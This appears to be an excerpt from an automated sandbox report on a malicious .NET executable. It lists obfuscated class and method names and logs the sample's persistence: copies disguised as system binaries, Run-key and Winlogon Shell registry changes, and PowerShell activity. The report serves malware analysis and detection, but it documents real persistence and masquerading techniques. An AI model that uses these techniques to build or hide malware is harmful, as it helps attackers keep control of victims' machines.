                            Source: EQdhBjQw4G.exe, Al58N732kOrItwneVtY.csHigh entropy of concatenated method names: 'JHa3HHMjid', 'uPP31MDfAb', 'ToD36k62VK', 'GPo3R6SiOh', 'Dispose', 'eWCRXPBq4XZyc85rCDBf', 'gKNIgwBqDqWtlXXFZEPb', 'xTstLVBq7teF4QqxgMFf', 'iI91LTBqc0ahTxoWrw3G', 'exh72yBq8HkTHS3qqOHv'
                            Source: EQdhBjQw4G.exe, bsnLd9gJsIZetF640ZZ.csHigh entropy of concatenated method names: 'LLag04a1Ka', 'UDdg3KGyHL', 'crDgkWns9j', 'Sg6gqGXTQV', 'biNgpNfcfW', 'rDUchtBap79rgTnR4XIJ', 'KAEbCSBakNGiuJK222yl', 'lP3floBaqyUVhAput0AR', 'X2bG3NBaCOXjFiPUXe5j', 'ghySvHBazppP5x06dOhd'
                            Source: EQdhBjQw4G.exe, LnLuPu8V05FNYi6y8hO.csHigh entropy of concatenated method names: 'FDN83N5k6a', 'HHc8klG5dC', 'hBw8q3xgVl', 'DfdRH3BmN58hrZBER71M', 'NCO87cBmAPyYXGR5nJPR', 'aT4FtOBmvqTt40r2tCf2', 'lHXenjBmYEhIbYfSijsV', 'fvp5fmBmrqSIE6sVunEb', 'Ql6lc1BmLs3fgxMhNZur'
                            Source: EQdhBjQw4G.exe, rXIKIlt5hpLfV0UYWn9.csHigh entropy of concatenated method names: 'oBFtpjKS6M', 'vkGtzIrcKj', 'BcZtyiBgYZ', 'GJKtsqR7mD', 'uiUtmnbZ8s', 'zwNta3P0cF', 'CqutXncDq6', 'PmAtPMRU9u', 'P6HtxnwgyK', 'iYDtZSkBqN'
                            Source: EQdhBjQw4G.exe, ClHWXZV2ybTDWrJFBuS.csHigh entropy of concatenated method names: 'method_0', 'h59', 'R73', 'KRNVHQSMOD', 'n01ZUgB3TRCPPtuykZQk', 'co4ZnUB35Ska5wbxWmB5', 'wxxNmbB3wFAcyjG5hxWM', 'WNQXbgB3yIq3SD6Whsv4', 'onwmn4B3sjvC86mwlJxd', 'jSMoiiB3mZjMSUmpP80N'
                            Source: EQdhBjQw4G.exe, HmYtZv4ZSpFB0RhGH9K.csHigh entropy of concatenated method names: 'qyf4VY39Ih', 'hL540VjVip', 'H7g43rs6Jk', 'kLj4kR7aPD', 'UZl4q44TVg', 'OOqvXXByzg1Cp9QHm3QD', 'sJ9hyOBypuZ57hQPMh1d', 'lfR5E3ByCmSiG8aZl3GU', 'MuUIZPBsF6vJbEWSlwNK', 'ehcwLqBsBU1XCdlVkrux'
                            Source: EQdhBjQw4G.exe, enAZfvE2nMXWbSsbAWm.csHigh entropy of concatenated method names: 'hW2EHE7BYs', 'YfBE1CXjX6', 'Of8V55BHZx71I2rjvIxm', 'gUAFIyBHJKAoM8NTjf12', 'f5WvlCBHVIL3xnIKeyva', 'CfbI4MBH0tqlsKuOiUHi', 'wgtosWBH3frNAhktQkE2', 'jc0CJkBHkuyYoswMM0P8'
                            Source: EQdhBjQw4G.exe, TrZZsgH6a6kj72ret59.csHigh entropy of concatenated method names: 'Close', 'qL6', 'go1H9xROhM', 'OOqHniCYrC', 'n8CHdiqcj9', 'Write', 'get_CanRead', 'get_CanSeek', 'get_CanWrite', 'get_Length'
                            Source: EQdhBjQw4G.exe, DUcSpHEfS4moNfpCwS8.csHigh entropy of concatenated method names: 'RmqEgO8qq1', 'AqkeVCBHmBAXVOCWWPAe', 'Ll1WK9BHa2atfjDuIudk', 'LdMM7kBHyIrPLHYjsOxx', 'dBk9uqBHs2hy7Uutc5A4', 'g7mtlTBHXVbGHqd9MBLl', 'TCDup1BHP3JIgg8yj2n1', 'rQRESYJUYc', 'Jm6EDv7yif', 'i57E7tDvil'
                            Source: EQdhBjQw4G.exe, oCY2SlL7HVNOmfawgMX.csHigh entropy of concatenated method names: 'OxlfY74GhX', 'YX3frxy3G5', 'f2mh0SBdZIrop8PPMH7k', 'qYSftDBdP41QoTv5Rqdl', 'EIbAqNBdx3a9DapIn7dg', 'P2g4DmBdJtd7WikhUSsX', 'jiesCeBdVZRhAcxd9LWi', 'CRPfff7IZV', 'FuSEu8Bdq5sIViKWqmUZ', 'vES8xBBd3VBNOureDIKC'
                            Source: EQdhBjQw4G.exe, stwjW6IrY3dA5D2SnIF.csHigh entropy of concatenated method names: 'KUfIIMnRlL', 'gdAd3QBTC2MRIxWkypQx', 'DExJx8BTz9Mt57t16ksa', 'KyPtn5BTq0TISJ6NgREk', 'wiRNBGBTpKRqc0QiZZXM', 'ujIIUweNVc', 'MbaFcYBTZ4TP9eo0eQMg', 'mQIILDBTP0Yv6D3G7eo2', 'KskMGDBTxFkpI8VS2OXo', 'v5naiYBTJNrlGofkpZZk'
                            Source: EQdhBjQw4G.exe, o85UtLpraMtZAmto0dI.csHigh entropy of concatenated method names: 'ae9WhwfC7SI', 'Gj8WhyffnnO', 'WMmswnBp5sARuwVaqMtG', 'YNRRmXBpwK1b9qJiHnE1', 'GcZ3G3BpyvYdAXOoCZWN', 'jUrxk9BpsgDPmeZLxJy9', 'xAZwnlBpm8n1TQTLYWmc'
                            Source: EQdhBjQw4G.exe, twd8kYEO1ytqitJQfSh.csHigh entropy of concatenated method names: 'M1FEv2GgGQ', 'cunENQqH8c', 'VjWkcuBHI0ybRyFSCAKv', 'bDMHe3BHlFcDWabaXRFZ', 'D9ovonBHfDk4rnICpeS6', 'N9LiKpBHSeY3e89E3byw', 'l7AthoBHDQ7EtDs7Qx0x', 'Gbd7RdBH7172Jt787Otx', 'L419m9BH4hnKjw8kxsbZ'
                            Source: EQdhBjQw4G.exe, k3xYrwoKEE61HhWWyfW.csHigh entropy of concatenated method names: 'LO4ow1lmsE', 'cdCoyJjl9N', 'trMostSuLP', 'Jq98FCBuaRbqoF2on8G4', 'DsLEOQBuXutQFnH6lUGu', 'POgBjcBuseb8ME6NTCRf', 'wjCW3cBumd1ZS5hTev4M', 'L3UogGMw21', 'TuPou7yNv4', 'WFdoQNtUY6'
                            Source: EQdhBjQw4G.exe, tXwkxtcy1WO27G0cK0B.csHigh entropy of concatenated method names: 'a99', 'yzL', 'method_0', 'method_1', 'x77', 'sK3cmkQWHf', 'TZfcauPwFN', 'Dispose', 'D31', 'wNK'
                            Source: EQdhBjQw4G.exe, x8BYk5eDi6k9Q3Oiq3H.csHigh entropy of concatenated method names: 'cvNe4MRLRi', 'FUAIJBB1wTSZo3jHZudW', 'p2CCEDB1yFtjCMinDDl8', 'QZp49VB1srXm97CfW71X', 'NVvrJIB1mlMosUV3SFwL', 'NF4CWNB1atFmucmpZixM', 'BIsOJ1B1TLq8fjp1MEqY', 'hsUgLCB1542QsrwOTiH2', 'fD95aGB1X9fHQHF0eYhe'
                            Source: EQdhBjQw4G.exe, DjKOdxeiZLQovTeMAYt.csHigh entropy of concatenated method names: 'tNWeIKAo4P', 'DjiCXWB19YhP3jQNPjb6', 'ObPJ4bB16HqfcWeNHD7g', 'TcokS9B1RPWUYrmPjcub', 'dQ1bEdB1noCtR4qaw2oc', 'ONTelcdvsr', 'YcVj3DB1QvfxxRaqGYU8', 'PlQHhkB12gwuZfm9htsm', 'IOdSedB1j5gvQBJLpogs', 'JMEWZBB1g7OfOtpQ5Go3'
                            Source: EQdhBjQw4G.exe, uI0Im2SvXU18gDMi4bJ.csHigh entropy of concatenated method names: 'Rrr', 'y1x', 'kKpBeDG4OHN', 'QKCBe7KUeCv', 'sJBfBSBwFe0tW1e4cp3T', 'IwV7nxBwBI0U6nKklj6y', 'VcI8XNBwWiSSOcIdq3i6', 'NpY3nWBwo3Qblw2ci80t', 'etq3vqBwbeuI2571dLcK', 'F6IOxgBwh5uMQEEsfFbM'
                            Source: EQdhBjQw4G.exe, yKQdHRLv1jjwLqb4ANG.csHigh entropy of concatenated method names: 'Dispose', 'JFSLYShZAM', 'np7Lrjny2M', 'rr7LLmJHl4', 'qGkx9DBnWN6KaCHSDbaS', 'GOHn1mBnoMwEwEcc63MX', 'fXprBaBnblFu0YIdMyE6', 'aoFI7oBnhB0Iya8WRw85', 'rP7TcGBnG1p5yU9DnXaT'
                            Source: EQdhBjQw4G.exe, oA2QLi4ABhBPRrPch9X.csHigh entropy of concatenated method names: 'm9I42vxVg7', 'kwG4N4RTcX', 'l4T4YggpdC', 'yX44rYwxWJ', 'nAF4LdF5v0', 'HJ64UfggQD', 'sfT4iPbuLd', 'Gn64MU6cAx', 'ltH4lSmiTS', 'cwk4fyvXeI'
                            Source: EQdhBjQw4G.exe, cXdLKLoxGV0QwOwe0Lf.csHigh entropy of concatenated method names: 'TZZbocFF1v', 'bpvbbc15hs', 'ruXbhGpB9Y', 'DgweLVBQeRPiEs83iEw6', 'ttmoj7BQGpLAkvWspqWW', 'dLIjEnBQEeAVJesshhu4', 'yp0bvsYMpc', 'gsUWWqBQNuocIRiUTYkr', 'KwNb0jBQAGg7c2efeG6S', 'exIh72BQvWIBb9GejW0H'
                            Source: EQdhBjQw4G.exe, OdvTcVMcKLZYX9cm7v.csHigh entropy of concatenated method names: 'tT11gWacO', 'TWeeUsBK2DfhRUHkGSYF', 'gr8DGBBKj4iLmmokSFP2', 'XlggTCBKuoFtQvdmiGZ7', 'xdbtQvBKQcC552atAxC8', 'XerfokBAZ', 'Hj4IH37QQ', 'hr5Sg46Pu', 'qYfD1iDTH', 'jLd7tGC6M'
                            Source: EQdhBjQw4G.exe, ojsYqUBlDcRWPhPNiG3.csHigh entropy of concatenated method names: 'RTM', 'KZ3', 'H7p', 'eeS', 'imethod_0', 'XbG', 'enGBEzQHt6O', 'vsbBbBgVvD9', 'vueIAeBtDlrt41KE6j9S', 'Lg8RAvBt7t5BPDqk8Jm4'
                            Source: EQdhBjQw4G.exe, Buu5PNOr4acgMAQ78hn.csHigh entropy of concatenated method names: 'q76', 'method_0', 'p9e', 'hkB', 'method_1', 'method_2', 'cPn6hiB65bc6pFSj6Ksr', 'V8RlWMB6wXcV8726Gn3V', 'qqNCW5B6yUePRf9kBMe1', 'WjhZRrB6swIB2hHS4dLa'
                            Source: EQdhBjQw4G.exe, O4Je4PDY6J77dl0QcmP.csHigh entropy of concatenated method names: 'UZ64BSFwmY', 'Hb44kJBy1k4v8SWOkxT0', 'VrPYymByj1ZdGMi330jT', 'oLk3SBByH2a9CU7fJrc2', 'cU2q1UBy6KDRHpDo5SSR', 'z5sDLbBfy8', 'JfKDU0yiQ0', 'bpVDieblkP', 'krQDM7mVj5', 'knWDlTjApT'
                            Source: EQdhBjQw4G.exe, OBJLJsfVH5D7ThnEo4x.csHigh entropy of concatenated method names: 'm1I', 'G4q', 'w29', 'hwNBeY16Grm', 'rlCBbmU8MKG', 'FPUUnyBTtHAiUUVcKm9r', 'fFKq83BTg6PiPSWC3k1b', 'POCNvHBTutI2grcKfYtj', 'wlOt71BTQcpY6EB1nUMi', 'eU4tcbBT2uCbvI1f0YVb'
                            Source: EQdhBjQw4G.exe, NNnb4gzghdssDB6VLt.csHigh entropy of concatenated method names: 'E8wBB4T0OK', 'j9yBog8C2P', 'lTcBb9EHYl', 'nknBh8tUen', 'vFoBG2VuZG', 'YCKBElrPhi', 'z6pBOegW9v', 'pQ4e7pBtEFjQD1W1sEHm', 'gvBVZ3Btep3X8OFnkdsm', 'DKyGq3BtOt6r1f9P9ioo'
                            Source: EQdhBjQw4G.exe, U5dnxvE5VR0MeFLnbxw.csHigh entropy of concatenated method names: 'qvvE3SoHdg', 'JqvEkdIhtg', 'YZcMoKB1eHeCF1cenjWK', 'wA2syVB1OLm6HWiE8GRO', 'VyjbsfB1AtSYHZjOCjXP', 'ViQEyYqZB4', 'M8aEsEVlSq', 'RCHEmTcjHQ', 'oTMEaYZpl9', 'yFxEXTYbSm'
                            Source: EQdhBjQw4G.exe, P1odymeAyUUZWKNgH3a.csHigh entropy of concatenated method names: 'X8YeNMS8Ub', 'chweYj9AKa', 'CLPerhitae', 'oQFW3VB1D0d4RupnrHuN', 'BRkvGtB17kGDJCj6uoO3', 'Jf1GPkB1I9YO5XCnqjXe', 'jO8ccMB1SCLdMVvauXAX', 'G7BgEoB14dhPfDMDT7jW', 'BI4Xr7B1cxRZ5SSsiiPv', 'nG2AyDB18pLtVAH7GiE5'
                            Source: EQdhBjQw4G.exe, HrFkDehZW16MTWXnhDp.csHigh entropy of concatenated method names: 'huxhqHfN3J', 'vkchpaLpMU', 'gfhhChs4mg', 'A0ShzwRR7v', 'ifRGFXaUfR', 'u87GBQbho6', 'gm6GWUKjDT', 'QnbxClBjIT59xuwSiQTe', 'xP4EatBjSVa7wGbtGuDp', 'pMh4tkBjlEh4HTqEOPoS'
                            Source: EQdhBjQw4G.exe, SrQXFPHxddbtDS4VpSI.csHigh entropy of concatenated method names: 'POpHJK2ZaN', 'k6r', 'ueK', 'QH3', 'zyGHVqRd8u', 'Flush', 'eCqH0U37l4', 'iToH3js6Tp', 'Write', 'YcSHkr5JOB'
                            Source: EQdhBjQw4G.exe, XT9hJbfnKtGNy7CaF9j.csHigh entropy of concatenated method names: 'fWnfmgJaHj', 'Ou9faiLJ48', 'wcTfXBxO0D', 'lfKdufBTMY8V8Uj9m7Mt', 'EitVuZBTlcuWrWMa4sDN', 'uq73hiBTUqa9CHaTrEIR', 'rO3lVoBTie76uyxbMMXQ', 'L61fTaG6EA', 'suof56XBhQ', 'rZhfwDr5c2'
                            Source: EQdhBjQw4G.exe, upNa45QCvs48jrqMkqX.csHigh entropy of concatenated method names: 'G5W2Fg5FJB', 'e512BKfglK', 'Yd7', 'bZm2WcQMGb', 'kQ52ohI2l8', 'osv2b80Lag', 'qCj2htpcS3', 'nJUtGZBxbnVUVWLNaiLH', 'rw5PY0BxW1Uc4iINdXm4', 'EoICrnBxoC4a0h107UHO'
                            Source: EQdhBjQw4G.exe, doxEQiEB5gR2aIxorCJ.csHigh entropy of concatenated method names: 'PQLEo9h1Xn', 'aG4EbrOgY7', 'WYfEhWH2m0', 'RMIYXeBHNjiuXw51jKsk', 'qxqiwyBHYgUZFQSgKQyj', 'WEx5WWBHrQQ4lEEeZqcO', 'a01AF2BHLvDX6Yuci8gO', 'WC0HSEBHUKsRlkVZxUVx', 'rHiAS9BHiUTvweCHpYtn'
                            Source: EQdhBjQw4G.exe, Yuhnvpn2QhnxP4kSHU4.csHigh entropy of concatenated method names: 'rtBnHttrJP', 'UOGn17WDT2', 'Pykn6jKrUY', 'tQHnRaHiv4', 'Mpvn9Rjj4L', 'QshnnBZI1h', 'V50ndY8cEB', 'KABnTqfeTU', 'tT9n5IRT94', 'eANnwYxDAy'
                            Source: EQdhBjQw4G.exe, Uuq7DtemIloFIxNDh00.csHigh entropy of concatenated method names: 'fuue3GotfP', 'Wc33qiB6ibqWULW1vLKt', 'h93aHnB6L7SWmAgt3bKj', 'H8P8QYB6UKbcuQSUNld3', 'yu7GLVB6MNbp61r2iuc7', 'P9X', 'vmethod_0', 'oR8Bbt0eVdt', 'imethod_0', 'tMqCEhB6vvDEN1arN5tJ'
                            Source: EQdhBjQw4G.exe, E8R0v1SUlCEpt5FBll3.csHigh entropy of concatenated method names: 'a7KIKpBw8eyqZsLogDaU', 'FRs1NeBwK7n9ROipX60Y', 'HKZ37jBwtlhMv4w7KSaP', 'BS4ycJBw4l5bTB5QhKI9', 'LYPbpWBwcJACfoZMPTcn', 'method_0', 'method_1', 'kGrSMAbUdQ', 'oMjSl5VVqO', 'JJZSf3ZH8P'
                            Source: EQdhBjQw4G.exe, UOKYr93Y4GeCUG8PEXE.csHigh entropy of concatenated method names: 'ere3UNiNwm', 'qFo3fGbAHj', 'PhJ3DUQZPH', 'JSk372wl8q', 'tK6347rEiL', 'k5h3cVa46e', 'Hw038PwGBH', 'A3J3Khqj1X', 'Dispose', 'wPPq76BqUrB75EhoOXiQ'

                            Persistence and Installation Behavior

                            Source: unknown | Executable created and started: C:\Windows\SysWOW64\en-GB\Licenses\_Default\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | System file written: C:\Windows\System32\SecurityHealthSystray.exe
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Windows\System32\SecurityHealthSystray.exe
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exe | File created: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\RuntimeBroker.exe
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exe | File created: C:\Users\user\Desktop\vTqzCdqK.log
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exe | File created: C:\Users\user\Desktop\nmJRokpY.log
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe | File created: C:\Users\user\Desktop\FpFoWZYA.log
                            Source: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe | File created: C:\Users\user\Desktop\CnTGBqTF.log
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exe | File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exe | File created: C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exe | File created: C:\Windows\SysWOW64\en-GB\Licenses\_Default\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe

                            Boot Survival

                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ROxqvkhuKqPawtyxZXXxveaCsizbJ
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ROxqvkhuKqPawtyxZXXxveaCsizbJ
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run EQdhBjQw4G
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exe | File created: C:\Users\Default User\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exe | File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe\:Zone.Identifier:$DATA
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exe | File created: C:\Users\Default User\Start Menu\a4716c5db9108b
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run EQdhBjQw4G

                            Hooking and other Techniques for Hiding and Protection

                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Users\user\Desktop\EQdhBjQw4G.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
